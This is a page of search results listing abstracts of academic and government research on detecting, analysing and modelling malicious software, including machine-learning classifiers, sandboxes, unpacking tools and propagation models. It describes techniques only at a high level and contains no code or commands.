Sample records for malicious software malware

  1. Relationship between Effective Application of Machine Learning and Malware Detection: A Quantitative Study

    ERIC Educational Resources Information Center

    Enfinger, Kerry Wayne

    2016-01-01

    The number of malicious files present in the public domain continues to rise at a substantial rate. Current anti-malware software utilizes a signature-based method to detect the presence of malicious software. Generating these pattern signatures is time consuming due to malicious code complexity and the need for expert analysis, however, by making…

  2. Extending Case-Based Reasoning (CBR) Approaches to Semi-automated Network Alert Reporting

    DTIC Science & Technology

    2013-04-01

    connecting to the domain is likely infected with malware, or may have been exposed to malicious code. -- Detailed Information: The Sourcefire VRT ...to be generated by malware. After applying an extensive whitelist, the VRT pulls out the most commonly visited domains and adds them to its...malicious software. The VRT recommends ClamAV for Windows 3.0. 39 -- Contributors: Sourcefire Vulnerability Research Team -- Additional

  3. Proactive malware detection

    NASA Astrophysics Data System (ADS)

    Gloster, Jonathan; Diep, Michael; Dredden, David; Mix, Matthew; Olsen, Mark; Price, Brian; Steil, Betty

    2014-06-01

    Small-to-medium sized businesses lack resources to deploy and manage high-end advanced solutions to deter sophisticated threats from well-funded adversaries, but evidence shows that these types of businesses are becoming key targets. As malicious code and network attacks become more sophisticated, classic signature-based virus and malware detection methods are less effective. To augment the current malware methods of detection, we developed a proactive approach to detect emerging malware threats using open source tools and intelligence to discover patterns and behaviors of malicious attacks and adversaries. Technical and analytical skills are combined to track adversarial behavior, methods and techniques. We established a controlled (separated domain) network to identify, monitor, and track malware behavior to increase understanding of the methods and techniques used by cyber adversaries. We created a suite of tools that observe the network and system performance looking for anomalies that may be caused by malware. The toolset collects information from open-source tools and provides meaningful indicators that the system was under or has been attacked. When malware is discovered, we analyzed and reverse engineered it to determine how it could be detected and prevented. Results have shown that with minimum resources, cost effective capabilities can be developed to detect abnormal behavior that may indicate malicious software.

  4. Improvement of Binary Analysis Components in Automated Malware Analysis Framework

    DTIC Science & Technology

    2017-02-21

    analyze malicious software (malware) with minimum human interaction. The system autonomously analyze malware samples by analyzing malware binary program...AFRL-AFOSR-JP-TR-2017-0018 Improvement of Binary Analysis Components in Automated Malware Analysis Framework Keiji Takeda KEIO UNIVERSITY Final...currently valid OMB control number . PLEASE DO NOT RETURN YOUR FORM TO THE ABOVE ORGANIZATION. 1. REPORT DATE (DD-MM-YYYY)      21-02-2017 2. REPORT

  5. Using Anticipative Malware Analysis to Support Decision Making

    DTIC Science & Technology

    2010-11-01

    specifically, we have designed and implemented a network sandbox, i.e. a sandbox that allows us to study malware behaviour from the network perspective. We...plan to use this sandbox to generate malware-sample profiles that can be used by decision making algorithms to help network administrators and security...also allows the user to specify the network topology to be used. 1 INTRODUCTION Once the presence of a malicious software (malware) threat has been

  6. Development of the disable software reporting system on the basis of the neural network

    NASA Astrophysics Data System (ADS)

    Gavrylenko, S.; Babenko, O.; Ignatova, E.

    2018-04-01

The PE structure of malicious and secure software is analyzed, features are highlighted, binary sign vectors are obtained and used as inputs for training the neural network. A software model for detecting malware based on the ART-1 neural network was developed, optimal similarity coefficients were found, and testing was performed. The obtained research results showed the possibility of using the developed system of identifying malicious software in computer systems protection systems.

  7. Deep PDF parsing to extract features for detecting embedded malware.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Munson, Miles Arthur; Cross, Jesse S.

    2011-09-01

The number of PDF files with embedded malicious code has risen significantly in the past few years. This is due to the portability of the file format, the ways Adobe Reader recovers from corrupt PDF files, the addition of many multimedia and scripting extensions to the file format, and many format properties the malware author may use to disguise the presence of malware. Current research focuses on executable, MS Office, and HTML formats. In this paper, several features and properties of PDF Files are identified. Features are extracted using an instrumented open source PDF viewer. The feature descriptions of benign and malicious PDFs can be used to construct a machine learning model for detecting possible malware in future PDF files. The detection rate of PDF malware by current antivirus software is very low. A PDF file is easy to edit and manipulate because it is a text format, providing a low barrier to malware authors. Analyzing PDF files for malware is nonetheless difficult because of (a) the complexity of the formatting language, (b) the parsing idiosyncrasies in Adobe Reader, and (c) undocumented correction techniques employed in Adobe Reader. In May 2011, Esparza demonstrated that PDF malware could be hidden from 42 of 43 antivirus packages by combining multiple obfuscation techniques [4]. One reason current antivirus software fails is the ease of varying byte sequences in PDF malware, thereby rendering conventional signature-based virus detection useless. The compression and encryption functions produce sequences of bytes that are each functions of multiple input bytes. As a result, padding the malware payload with some whitespace before compression/encryption can change many of the bytes in the final payload. In this study we analyzed a corpus of 2591 benign and 87 malicious PDF files. While this corpus is admittedly small, it allowed us to test a system for collecting indicators of embedded PDF malware. We will call these indicators features throughout the rest of this report. The features are extracted using an instrumented PDF viewer, and are the inputs to a prediction model that scores the likelihood of a PDF file containing malware. The prediction model is constructed from a sample of labeled data by a machine learning algorithm (specifically, decision tree ensemble learning). Preliminary experiments show that the model is able to detect half of the PDF malware in the corpus with zero false alarms. We conclude the report with suggestions for extending this work to detect a greater variety of PDF malware.

  8. Personal privacy, information assurance, and the threat posed by malware technology

    NASA Astrophysics Data System (ADS)

    Stytz, Martin R.; Banks, Sheila B.

    2006-04-01

    In spite of our best efforts to secure the cyber world, the threats posed to personal privacy by attacks upon networks and software continue unabated. While there are many reasons for this state of affairs, clearly one of the reasons for continued vulnerabilities in software is the inability to assess their security properties and test their security systems while they are in development. A second reason for this growing threat to personal privacy is the growing sophistication and maliciousness of malware coupled with the increasing difficulty of detecting malware. The pervasive threat posed by malware coupled with the difficulties faced when trying to detect its presence or an attempted intrusion make addressing the malware threat one of the most pressing issues that must be solved in order to insure personal privacy to users of the internet. In this paper, we will discuss the threat posed by malware, the types of malware found in the wild (outside of computer laboratories), and current techniques that are available for from a successful malware penetration. The paper includes a discussion of anti-malware tools and suggestions for future anti-malware efforts.

  9. Behavioral analysis of malicious code through network traffic and system call monitoring

    NASA Astrophysics Data System (ADS)

    Grégio, André R. A.; Fernandes Filho, Dario S.; Afonso, Vitor M.; Santos, Rafael D. C.; Jino, Mario; de Geus, Paulo L.

    2011-06-01

    Malicious code (malware) that spreads through the Internet, such as viruses, worms and trojans, is a major threat to information security nowadays and a profitable business for criminals. There are several approaches to analyze malware by monitoring its actions while it is running in a controlled environment, which helps to identify malicious behaviors. In this article we propose a tool to analyze malware behavior in a non-intrusive and effective way, extending the analysis possibilities to cover malware samples that bypass current approaches and also fixing some issues with these approaches.

  10. Mal-Xtract: Hidden Code Extraction using Memory Analysis

    NASA Astrophysics Data System (ADS)

    Lim, Charles; Syailendra Kotualubun, Yohanes; Suryadi; Ramli, Kalamullah

    2017-01-01

    Software packers have been used effectively to hide the original code inside a binary executable, making it more difficult for existing signature-based anti-malware software to detect malicious code inside the executable. A new method based on written and rewritten memory sections is introduced to detect the exact end time of the unpacking routine and extract the original code from a packed binary executable using Memory Analysis running in a software-emulated environment. Our experiment results show that at least 97% of the original code from the various binary executables packed with different software packers could be extracted. The proposed method has also successfully extracted hidden code from recent malware family samples.

  11. Assessing the Macro-Level Correlates of Malware Infections Using a Routine Activities Framework.

    PubMed

    Holt, Thomas J; Burruss, George W; Bossler, Adam M

    2018-05-01

    The ability to gain unauthorized access to computer systems to engage in espionage and data theft poses a massive threat to individuals worldwide. There has been minimal focus, however, on the role of malicious software, or malware, which can automate this process. This study examined the macro-correlates of malware infection at the national level by using an open repository of known malware infections and utilizing a routine activities framework. Negative inflated binomial models for counts indicated that nations with greater technological infrastructure, more political freedoms, and with less organized crime financial impact were more likely to report malware infections. The number of Computer Emergency Response Teams (CERTs) in a nation was not significantly related with reported malware infection. The implications of the study for the understanding of malware infection, routine activity theory, and target-hardening strategies are discussed.

  12. Verification and Validation of the Malicious Activity Simulation Tool (MAST) for Network Administrator Training and Evaluation

    DTIC Science & Technology

    2012-03-01

    to sell fake antivirus software ; Gammima, which was used to steal gaming login information; and Zeus, which was used to steal banking information...13 3. Viruses ......................................14 C. PROOF OF CONCEPT OF SOFTWARE TRAINING USING MALWARE MIMICS...33 2. Software .....................................34 3. COMPOSE CG-71 Virtual Machines ...............37 a. Integrated Shipboard Network System

  13. The effects of different representations on static structure analysis of computer malware signatures.

    PubMed

    Narayanan, Ajit; Chen, Yi; Pang, Shaoning; Tao, Ban

    2013-01-01

    The continuous growth of malware presents a problem for internet computing due to increasingly sophisticated techniques for disguising malicious code through mutation and the time required to identify signatures for use by antiviral software systems (AVS). Malware modelling has focused primarily on semantics due to the intended actions and behaviours of viral and worm code. The aim of this paper is to evaluate a static structure approach to malware modelling using the growing malware signature databases now available. We show that, if malware signatures are represented as artificial protein sequences, it is possible to apply standard sequence alignment techniques in bioinformatics to improve accuracy of distinguishing between worm and virus signatures. Moreover, aligned signature sequences can be mined through traditional data mining techniques to extract metasignatures that help to distinguish between viral and worm signatures. All bioinformatics and data mining analysis were performed on publicly available tools and Weka.

  14. The Effects of Different Representations on Static Structure Analysis of Computer Malware Signatures

    PubMed Central

    Narayanan, Ajit; Chen, Yi; Pang, Shaoning; Tao, Ban

    2013-01-01

    The continuous growth of malware presents a problem for internet computing due to increasingly sophisticated techniques for disguising malicious code through mutation and the time required to identify signatures for use by antiviral software systems (AVS). Malware modelling has focused primarily on semantics due to the intended actions and behaviours of viral and worm code. The aim of this paper is to evaluate a static structure approach to malware modelling using the growing malware signature databases now available. We show that, if malware signatures are represented as artificial protein sequences, it is possible to apply standard sequence alignment techniques in bioinformatics to improve accuracy of distinguishing between worm and virus signatures. Moreover, aligned signature sequences can be mined through traditional data mining techniques to extract metasignatures that help to distinguish between viral and worm signatures. All bioinformatics and data mining analysis were performed on publicly available tools and Weka. PMID:23983644

  15. Network traffic anomaly prediction using Artificial Neural Network

    NASA Astrophysics Data System (ADS)

    Ciptaningtyas, Hening Titi; Fatichah, Chastine; Sabila, Altea

    2017-03-01

    With the excessive increase in internet usage, malicious software (malware) has also increased significantly. Malware is software developed by hackers for illegal purpose(s), such as stealing data and identity, causing computer damage, or denying service to other users [1]. Malware that attacks a computer or server often triggers network traffic anomaly phenomena. Based on Sophos's report [2], Indonesia is the riskiest country for malware attacks and it also has high network traffic anomaly. This research uses an Artificial Neural Network (ANN) to predict network traffic anomaly based on malware attacks in Indonesia as recorded by Id-SIRTII/CC (Indonesia Security Incident Response Team on Internet Infrastructure/Coordination Center). The case study is the highest malware attack (SQL injection), which has happened in three consecutive years: 2012, 2013, and 2014 [4]. The data series is preprocessed first, then the network traffic anomaly is predicted using an Artificial Neural Network with two weight update algorithms: Gradient Descent and Momentum. The prediction error is calculated using Mean Squared Error (MSE) [7]. The experimental result shows that the MSE for SQL Injection is 0.03856. So, this approach can be used to predict network traffic anomaly.

  16. Web malware spread modelling and optimal control strategies

    NASA Astrophysics Data System (ADS)

    Liu, Wanping; Zhong, Shouming

    2017-02-01

    The popularity of the Web improves the growth of web threats. Formulating mathematical models for accurate prediction of malicious propagation over networks is of great importance. The aim of this paper is to understand the propagation mechanisms of web malware and the impact of human intervention on the spread of malicious hyperlinks. Considering the characteristics of web malware, a new differential epidemic model which extends the traditional SIR model by adding another delitescent compartment is proposed to address the spreading behavior of malicious links over networks. The spreading threshold of the model system is calculated, and the dynamics of the model is theoretically analyzed. Moreover, the optimal control theory is employed to study malware immunization strategies, aiming to keep the total economic loss of security investment and infection loss as low as possible. The existence and uniqueness of the results concerning the optimality system are confirmed. Finally, numerical simulations show that the spread of malware links can be controlled effectively with proper control strategy of specific parameter choice.

  17. Web malware spread modelling and optimal control strategies.

    PubMed

    Liu, Wanping; Zhong, Shouming

    2017-02-10

    The popularity of the Web improves the growth of web threats. Formulating mathematical models for accurate prediction of malicious propagation over networks is of great importance. The aim of this paper is to understand the propagation mechanisms of web malware and the impact of human intervention on the spread of malicious hyperlinks. Considering the characteristics of web malware, a new differential epidemic model which extends the traditional SIR model by adding another delitescent compartment is proposed to address the spreading behavior of malicious links over networks. The spreading threshold of the model system is calculated, and the dynamics of the model is theoretically analyzed. Moreover, the optimal control theory is employed to study malware immunization strategies, aiming to keep the total economic loss of security investment and infection loss as low as possible. The existence and uniqueness of the results concerning the optimality system are confirmed. Finally, numerical simulations show that the spread of malware links can be controlled effectively with proper control strategy of specific parameter choice.

  18. Web malware spread modelling and optimal control strategies

    PubMed Central

    Liu, Wanping; Zhong, Shouming

    2017-01-01

    The popularity of the Web improves the growth of web threats. Formulating mathematical models for accurate prediction of malicious propagation over networks is of great importance. The aim of this paper is to understand the propagation mechanisms of web malware and the impact of human intervention on the spread of malicious hyperlinks. Considering the characteristics of web malware, a new differential epidemic model which extends the traditional SIR model by adding another delitescent compartment is proposed to address the spreading behavior of malicious links over networks. The spreading threshold of the model system is calculated, and the dynamics of the model is theoretically analyzed. Moreover, the optimal control theory is employed to study malware immunization strategies, aiming to keep the total economic loss of security investment and infection loss as low as possible. The existence and uniqueness of the results concerning the optimality system are confirmed. Finally, numerical simulations show that the spread of malware links can be controlled effectively with proper control strategy of specific parameter choice. PMID:28186203

  19. Accuracy comparison among different machine learning techniques for detecting malicious codes

    NASA Astrophysics Data System (ADS)

    Narang, Komal

    2016-03-01

    In this paper, a machine learning based model for malware detection is proposed. It can detect newly released malware, i.e. zero-day attacks, by analyzing operation codes on the Android operating system. The accuracy of Naïve Bayes, Support Vector Machine (SVM) and Neural Network for detecting malicious code has been compared for the proposed model. In the experiment 400 benign files, 100 system files and 500 malicious files have been used to construct the model. The model yields the best accuracy, 88.9%, when a neural network is used as the classifier, and achieves 95% and 82.8% for sensitivity and specificity respectively.

  20. Spatial-temporal modeling of malware propagation in networks.

    PubMed

    Chen, Zesheng; Ji, Chuanyi

    2005-09-01

    Network security is an important task of network management. One threat to network security is malware (malicious software) propagation. One type of malware is called topological scanning that spreads based on topology information. The focus of this work is on modeling the spread of topological malwares, which is important for understanding their potential damages, and for developing countermeasures to protect the network infrastructure. Our model is motivated by probabilistic graphs, which have been widely investigated in machine learning. We first use a graphical representation to abstract the propagation of malwares that employ different scanning methods. We then use a spatial-temporal random process to describe the statistical dependence of malware propagation in arbitrary topologies. As the spatial dependence is particularly difficult to characterize, the problem becomes how to use simple (i.e., biased) models to approximate the spatially dependent process. In particular, we propose the independent model and the Markov model as simple approximations. We conduct both theoretical analysis and extensive simulations on large networks using both real measurements and synthesized topologies to test the performance of the proposed models. Our results show that the independent model can capture temporal dependence and detailed topology information and, thus, outperforms the previous models, whereas the Markov model incorporates a certain spatial dependence and, thus, achieves a greater accuracy in characterizing both transient and equilibrium behaviors of malware propagation.

  1. Detecting and classifying method based on similarity matching of Android malware behavior with profile.

    PubMed

    Jang, Jae-Wook; Yun, Jaesung; Mohaisen, Aziz; Woo, Jiyoung; Kim, Huy Kang

    2016-01-01

    Mass-market mobile security threats have increased recently due to the growth of mobile technologies and the popularity of mobile devices. Accordingly, techniques have been introduced for identifying, classifying, and defending against mobile threats utilizing static, dynamic, on-device, and off-device techniques. Static techniques are easy to evade, while dynamic techniques are expensive. On-device techniques are evasion, while off-device techniques need to be always online. To address some of those shortcomings, we introduce Andro-profiler, a hybrid behavior based analysis and classification system for mobile malware. Andro-profiler's main goals are efficiency, scalability, and accuracy. For that, Andro-profiler classifies malware by exploiting the behavior profiling extracted from the integrated system logs including system calls. Andro-profiler executes a malicious application on an emulator in order to generate the integrated system logs, and creates human-readable behavior profiles by analyzing the integrated system logs. By comparing the behavior profile of a malicious application with the representative behavior profile for each malware family using a weighted similarity matching technique, Andro-profiler detects and classifies it into malware families. The experiment results demonstrate that Andro-profiler is scalable, performs well in detecting and classifying malware with accuracy greater than 98%, outperforms the existing state-of-the-art work, and is capable of identifying 0-day mobile malware samples.

  2. Malware detection and analysis

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Chiang, Ken; Lloyd, Levi; Crussell, Jonathan

    Embodiments of the invention describe systems and methods for malicious software detection and analysis. A binary executable comprising obfuscated malware on a host device may be received, and incident data indicating a time when the binary executable was received and identifying processes operating on the host device may be recorded. The binary executable is analyzed via a scalable plurality of execution environments, including one or more non-virtual execution environments and one or more virtual execution environments, to generate runtime data and deobfuscation data attributable to the binary executable. At least some of the runtime data and deobfuscation data attributable to the binary executable is stored in a shared database, while at least some of the incident data is stored in a private, non-shared database.

  3. Method for detecting core malware sites related to biomedical information systems.

    PubMed

    Kim, Dohoon; Choi, Donghee; Jin, Jonghyun

    2015-01-01

    Most advanced persistent threat attacks target web users through malicious code within landing (exploit) or distribution sites. There is an urgent need to block the affected websites. Attacks on biomedical information systems are no exception to this issue. In this paper, we present a method for locating malicious websites that attempt to attack biomedical information systems. Our approach uses malicious code crawling to rearrange websites in the order of their risk index by analyzing the centrality between malware sites and proactively eliminates the root of these sites by finding the core-hub node, thereby reducing unnecessary security policies. In particular, we dynamically estimate the risk index of the affected websites by analyzing various centrality measures and converting them into a single quantified vector. On average, the proactive elimination of core malicious websites results in an average improvement in zero-day attack detection of more than 20%.

  4. Method for Detecting Core Malware Sites Related to Biomedical Information Systems

    PubMed Central

    Kim, Dohoon; Choi, Donghee; Jin, Jonghyun

    2015-01-01

    Most advanced persistent threat attacks target web users through malicious code within landing (exploit) or distribution sites. There is an urgent need to block the affected websites. Attacks on biomedical information systems are no exception to this issue. In this paper, we present a method for locating malicious websites that attempt to attack biomedical information systems. Our approach uses malicious code crawling to rearrange websites in the order of their risk index by analyzing the centrality between malware sites and proactively eliminates the root of these sites by finding the core-hub node, thereby reducing unnecessary security policies. In particular, we dynamically estimate the risk index of the affected websites by analyzing various centrality measures and converting them into a single quantified vector. On average, the proactive elimination of core malicious websites results in an average improvement in zero-day attack detection of more than 20%. PMID:25821511

  5. Identifying compromised systems through correlation of suspicious traffic from malware behavioral analysis

    NASA Astrophysics Data System (ADS)

    Camilo, Ana E. F.; Grégio, André; Santos, Rafael D. C.

    2016-05-01

    Malware detection may be accomplished through the analysis of their infection behavior. To do so, dynamic analysis systems run malware samples and extract their operating system activities and network traffic. This traffic may represent malware accessing external systems, either to steal sensitive data from victims or to fetch other malicious artifacts (configuration files, additional modules, commands). In this work, we propose the use of visualization as a tool to identify compromised systems based on correlating malware communications in the form of graphs and finding isomorphisms between them. We produced graphs from over 6 thousand distinct network traffic files captured during malware execution and analyzed the existing relationships among malware samples and IP addresses.

  6. 4 Steps to Combat Malware Enterprisewide

    ERIC Educational Resources Information Center

    Zeltser, Lenny

    2011-01-01

    Too often, organizations make the mistake of treating malware infections as a series of independent occurrences. Each time a malicious program is discovered, IT simply cleans up or rebuilds the affected host, and then moves on with routine operational tasks. Yet, this approach doesn't allow the institution to keep up with the increasingly…

  7. Directed Hidden-Code Extractor for Environment-Sensitive Malwares

    NASA Astrophysics Data System (ADS)

    Jia, Chunfu; Wang, Zhi; Lu, Kai; Liu, Xinhai; Liu, Xin

    Malware writers often use packing techniques to hide malicious payloads. A number of dynamic unpacking tools are designed in order to identify and extract the hidden code in packed malware. However, such unpacking methods are all based on a highly controlled environment that is vulnerable to various anti-unpacking techniques. If the execution environment is suspicious, malware may stay inactive for a long time or stop execution immediately to evade detection. In this paper, we propose a novel approach that automatically reasons about the environment requirements imposed by malware, then directs an unpacking tool to change the controlled environment to extract the hidden code in the new environment. The experimental results show that our approach significantly increases the resilience of traditional unpacking tools to environment-sensitive malware.

  8. Application distribution model and related security attacks in VANET

    NASA Astrophysics Data System (ADS)

    Nikaein, Navid; Kanti Datta, Soumya; Marecar, Irshad; Bonnet, Christian

    2013-03-01

    In this paper, we present a model for application distribution and related security attacks in dense vehicular ad hoc networks (VANET) and sparse VANET which forms a delay tolerant network (DTN). We study the vulnerabilities of VANET to evaluate the attack scenarios and introduce a new attacker's model as an extension to the work done in [6]. Then a VANET model has been proposed that supports the application distribution through proxy app stores on top of mobile platforms installed in vehicles. The steps of application distribution have been studied in detail. We have identified key attacks (e.g. malware, spamming and phishing, software attack and threat to location privacy) for dense VANET and two attack scenarios for sparse VANET. It has been shown that attacks can be launched by distributing malicious applications and injecting malicious codes to the On Board Unit (OBU) by exploiting OBU software security holes. Consequences of such security attacks have been described. Finally, countermeasures including the concept of a sandbox have also been presented in depth.

  9. Malware Memory Analysis of the Jynx2 Linux Rootkit (Part 1): Investigating a Publicly Available Linux Rootkit Using the Volatility Memory Analysis Framework

    DTIC Science & Technology

    2014-10-01

    indication that not a single scanner was able to detect the rootkit as malicious or infected. SHA256 ...clear indication that not a single scanner was able detect it as malicious, infected or associated to the Jynx2 rootkit. SHA256

  10. Separation of Benign and Malicious Network Events for Accurate Malware Family Classification

    DTIC Science & Technology

    2015-09-28

    use Kullback - Leibler (KL) divergence [15] to measure the information ...related work in an important aspect concerning the order of events. We use n-grams to capture the order of events, which exposes richer information about...DISCUSSION Using n-grams on higher level network events helps understand the underlying operation of the malware, and provides a good feature set

  11. Malware and Disease: Lessons from Cyber Intelligence for Public Health Surveillance.

    PubMed

    Smith, Frank L

    2016-01-01

    Malicious software and infectious diseases are similar in several respects, as are the functional requirements for surveillance and intelligence to defend against these threats. Given these similarities, this article compares and contrasts the actors, relationships, and norms at work in cyber intelligence and disease surveillance. Historical analysis reveals that civilian cyber defense is more decentralized, private, and voluntary than public health in the United States. Most of these differences are due to political choices rather than technical necessities. In particular, political resistance to government institutions has shaped cyber intelligence over the past 30 years, which is a troubling sign for attempts to improve disease surveillance through local, state, and federal health departments. Information sharing about malware is also limited, despite information technology being integral to cyberspace. Such limits suggest that automation through electronic health records will not automatically improve public health surveillance. Still, certain aspects of information sharing and analysis for cyber defense are worth emulating or, at the very least, learning from to help detect and manage health threats.

  12. Malware and Disease: Lessons from Cyber Intelligence for Public Health Surveillance

    PubMed Central

    Smith, Frank L.

    2016-01-01

    Malicious software and infectious diseases are similar in several respects, as are the functional requirements for surveillance and intelligence to defend against these threats. Given these similarities, this article compares and contrasts the actors, relationships, and norms at work in cyber intelligence and disease surveillance. Historical analysis reveals that civilian cyber defense is more decentralized, private, and voluntary than public health in the United States. Most of these differences are due to political choices rather than technical necessities. In particular, political resistance to government institutions has shaped cyber intelligence over the past 30 years, which is a troubling sign for attempts to improve disease surveillance through local, state, and federal health departments. Information sharing about malware is also limited, despite information technology being integral to cyberspace. Such limits suggest that automation through electronic health records will not automatically improve public health surveillance. Still, certain aspects of information sharing and analysis for cyber defense are worth emulating or, at the very least, learning from to help detect and manage health threats. PMID:27564783

  13. DyHAP: Dynamic Hybrid ANFIS-PSO Approach for Predicting Mobile Malware.

    PubMed

    Afifi, Firdaus; Anuar, Nor Badrul; Shamshirband, Shahaboddin; Choo, Kim-Kwang Raymond

    2016-01-01

    To deal with the large number of malicious mobile applications (i.e. mobile malware), a number of malware detection systems have been proposed in the literature. In this paper, we propose a hybrid method to find the optimum parameters that can be used to facilitate mobile malware identification. We also present a multi-agent system architecture comprising three system agents (i.e. sniffer, extraction and selection agents) to capture and manage the pcap file for the data preparation phase. In our hybrid approach, we combine an adaptive neuro-fuzzy inference system (ANFIS) and particle swarm optimization (PSO). Evaluations using data captured on a real-world Android device and the MalGenome dataset demonstrate the effectiveness of our approach in comparison to two hybrid optimization methods, differential evolution (ANFIS-DE) and ant colony optimization (ANFIS-ACO).

  14. DyHAP: Dynamic Hybrid ANFIS-PSO Approach for Predicting Mobile Malware

    PubMed Central

    Afifi, Firdaus; Anuar, Nor Badrul; Shamshirband, Shahaboddin

    2016-01-01

    To deal with the large number of malicious mobile applications (i.e. mobile malware), a number of malware detection systems have been proposed in the literature. In this paper, we propose a hybrid method to find the optimum parameters that can be used to facilitate mobile malware identification. We also present a multi-agent system architecture comprising three system agents (i.e. sniffer, extraction and selection agents) to capture and manage the pcap file for the data preparation phase. In our hybrid approach, we combine an adaptive neuro-fuzzy inference system (ANFIS) and particle swarm optimization (PSO). Evaluations using data captured on a real-world Android device and the MalGenome dataset demonstrate the effectiveness of our approach in comparison to two hybrid optimization methods, differential evolution (ANFIS-DE) and ant colony optimization (ANFIS-ACO). PMID:27611312

  15. Identification of Malicious Web Pages by Inductive Learning

    NASA Astrophysics Data System (ADS)

    Liu, Peishun; Wang, Xuefang

    Malicious web pages have become an increasing threat to computer systems in recent years. Traditional anti-virus techniques typically focus on detecting the static signatures of malware and are ineffective against these new threats because they cannot deal with zero-day attacks. In this paper, a novel classification method for detecting malicious web pages is presented. The method performs generalization and specialization of attack patterns based on inductive learning, which can be used to update and expand the knowledge database. An attack pattern is established from an example and generalized by inductive learning, so that it can be used to detect unknown attacks whose behavior is similar to the example.

  16. MixDroid: A multi-features and multi-classifiers bagging system for Android malware detection

    NASA Astrophysics Data System (ADS)

    Huang, Weiqing; Hou, Erhang; Zheng, Liang; Feng, Weimiao

    2018-05-01

    In the past decade, the Android platform has rapidly taken over the mobile market for its superior convenience and open-source characteristics. However, with the popularity of Android, malware targeting Android devices is increasing rapidly, while the conventional rule-based and expert-experience approaches are no longer able to handle such explosive growth. In this paper, combining the theory of natural language processing and machine learning, we not only implement the basic feature extraction of permission application features, but also propose two innovative schemes of feature extraction, Dalvik opcode features and malicious code images, and implement an automatic Android malware detection system, MixDroid, which is based on multiple features and multiple classifiers. According to our experimental results on 20,000 Android applications, the detection accuracy of MixDroid is 98.1%, which proves our schemes' effectiveness in Android malware detection.

  17. Characterizing and Measuring Maliciousness for Cybersecurity Risk Assessment

    PubMed Central

    King, Zoe M.; Henshel, Diane S.; Flora, Liberty; Cains, Mariana G.; Hoffman, Blaine; Sample, Char

    2018-01-01

    Cyber attacks have been increasingly detrimental to networks, systems, and users, and are increasing in number and severity globally. To better predict system vulnerabilities, cybersecurity researchers are developing new and more holistic approaches to characterizing cybersecurity system risk. The process must include characterizing the human factors that contribute to cyber security vulnerabilities and risk. Rationality, expertise, and maliciousness are key human characteristics influencing cyber risk within this context, yet maliciousness is poorly characterized in the literature. There is a clear absence of literature pertaining to human factor maliciousness as it relates to cybersecurity and only limited literature relating to aspects of maliciousness in other disciplinary literatures, such as psychology, sociology, and law. In an attempt to characterize human factors as a contribution to cybersecurity risk, the Cybersecurity Collaborative Research Alliance (CSec-CRA) has developed a Human Factors risk framework. This framework identifies the characteristics of an attacker, user, or defender, all of whom may be adding to or mitigating against cyber risk. The maliciousness literature and the proposed maliciousness assessment metrics are discussed within the context of the Human Factors Framework and Ontology. Maliciousness is defined as the intent to harm. Most maliciousness cyber research to date has focused on detecting malicious software but fails to analyze an individual's intent to do harm to others by deploying malware or performing malicious attacks. Recent efforts to identify malicious human behavior as it relates to cybersecurity include analyzing motives driving insider threats as well as user profiling analyses. However, cyber-related maliciousness is neither well-studied nor well understood because individuals are not forced to expose their true selves to others while performing malicious attacks. Given the difficulty of interviewing malicious-behaving individuals and the potential untrustworthy nature of their responses, we aim to explore maliciousness as a human factor through the observable behaviors and attributes of an individual from their actions and interactions with society and networks, but to do so we will need to develop a set of analyzable metrics. The purpose of this paper is twofold: (1) to review human maliciousness-related literature in diverse disciplines (sociology, economics, law, psychology, philosophy, informatics, terrorism, and cybersecurity); and (2) to identify an initial set of proposed assessment metrics and instruments that might be culled from in a future effort to characterize human maliciousness within the cyber realm. The future goal is to integrate these assessment metrics into holistic cybersecurity risk analyses to determine the risk an individual poses to themselves as well as other networks, systems, and/or users. PMID:29459838

  18. Characterizing and Measuring Maliciousness for Cybersecurity Risk Assessment.

    PubMed

    King, Zoe M; Henshel, Diane S; Flora, Liberty; Cains, Mariana G; Hoffman, Blaine; Sample, Char

    2018-01-01

    Cyber attacks have been increasingly detrimental to networks, systems, and users, and are increasing in number and severity globally. To better predict system vulnerabilities, cybersecurity researchers are developing new and more holistic approaches to characterizing cybersecurity system risk. The process must include characterizing the human factors that contribute to cyber security vulnerabilities and risk. Rationality, expertise, and maliciousness are key human characteristics influencing cyber risk within this context, yet maliciousness is poorly characterized in the literature. There is a clear absence of literature pertaining to human factor maliciousness as it relates to cybersecurity and only limited literature relating to aspects of maliciousness in other disciplinary literatures, such as psychology, sociology, and law. In an attempt to characterize human factors as a contribution to cybersecurity risk, the Cybersecurity Collaborative Research Alliance (CSec-CRA) has developed a Human Factors risk framework. This framework identifies the characteristics of an attacker, user, or defender, all of whom may be adding to or mitigating against cyber risk. The maliciousness literature and the proposed maliciousness assessment metrics are discussed within the context of the Human Factors Framework and Ontology. Maliciousness is defined as the intent to harm. Most maliciousness cyber research to date has focused on detecting malicious software but fails to analyze an individual's intent to do harm to others by deploying malware or performing malicious attacks. Recent efforts to identify malicious human behavior as it relates to cybersecurity include analyzing motives driving insider threats as well as user profiling analyses. However, cyber-related maliciousness is neither well-studied nor well understood because individuals are not forced to expose their true selves to others while performing malicious attacks. Given the difficulty of interviewing malicious-behaving individuals and the potential untrustworthy nature of their responses, we aim to explore maliciousness as a human factor through the observable behaviors and attributes of an individual from their actions and interactions with society and networks, but to do so we will need to develop a set of analyzable metrics. The purpose of this paper is twofold: (1) to review human maliciousness-related literature in diverse disciplines (sociology, economics, law, psychology, philosophy, informatics, terrorism, and cybersecurity); and (2) to identify an initial set of proposed assessment metrics and instruments that might be culled from in a future effort to characterize human maliciousness within the cyber realm. The future goal is to integrate these assessment metrics into holistic cybersecurity risk analyses to determine the risk an individual poses to themselves as well as other networks, systems, and/or users.

  19. Unintentional Insider Threats: A Review of Phishing and Malware Incidents

    DTIC Science & Technology

    2014-07-01

    their agency as deliberate, malicious hackers [1]. This research supports the conclusions in the 2013 Verizon Data Breach Report that 47% of...References [1] SolarWinds. SolarWinds Federal Cybersecurity Survey Summary Report. SolarWinds, 2014. [2] Verizon. 2013 Data Breach Investigations

  20. Mobile Konami Codes: Analysis of Android Malware Services Utilizing Sensor and Resource-Based State Changes

    DTIC Science & Technology

    2015-03-01

    our focus will remain on Android rather than being all-inclusive of others such as iOS, Blackberry 10, and Windows Phone. The proof-of-concept...the attack surface for malicious applications to compromise vulnerable Services grows . Additionally, Services also have a life cycle with

  1. A Targeted Attack For Enhancing Resiliency of Intelligent Intrusion Detection Modules in Energy Cyber Physical Systems

    DOE Office of Scientific and Technical Information (OSTI.GOV)

